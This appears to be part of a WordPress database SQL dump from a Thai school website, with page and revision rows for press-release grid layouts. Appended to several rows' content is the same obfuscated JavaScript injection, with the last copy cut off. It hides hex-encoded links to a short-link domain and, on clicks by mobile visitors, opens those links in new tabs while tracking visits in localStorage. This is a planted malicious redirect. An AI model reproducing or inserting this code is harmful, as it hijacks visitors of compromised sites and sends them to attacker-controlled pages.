{\"blockId\":\"4bx7msyz\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"offset\":\"0\",\"showCustomField\":false,\"showContent\":false,\"showPagination\":true,\"thumbnailEffect\":\"cveffect-zoomin\",\"responsiveImg\":true,\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"},{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}]} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"bi9dfd8i\",\"whichLayout\":\"layout2\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"offset\":\"0\",\"showTaxonomy\":false,\"showCustomField\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":100},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"responsiveImg\":true,\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}]} /-->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ข่าวประชาสัมพันธ์','','publish','closed','closed','','%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c','','','2024-08-21 13:56:52','2024-08-21 06:56:52','',0,'http://pakhaeng.ssk.in.th/?page_id=355',0,'page','',0),
(356,1,'2024-08-01 11:12:21','2024-08-01 04:12:21','<!-- wp:contentviews/grid1 {\"blockId\":\"yevg045t\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"offset\":\"0\",\"showCustomField\":true,\"showPagination\":true,\"thumbnailEffect\":\"cveffect-zoomin\",\"responsiveImg\":true,\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"},{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}]} /-->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ข่าวประชาสัมพันธ์','','inherit','closed','closed','','355-revision-v1','','','2024-08-01 11:12:21','2024-08-01 04:12:21','',355,'http://pakhaeng.ssk.in.th/?p=356',0,'revision','',0),
(359,1,'2024-08-01 11:41:10','2024-08-01 04:41:10','<!-- wp:contentviews/grid1 {\"blockId\":\"yevg045t\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"offset\":\"0\",\"showCustomField\":false,\"showContent\":false,\"showPagination\":true,\"thumbnailEffect\":\"cveffect-zoomin\",\"responsiveImg\":true,\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"},{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}]} /-->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return 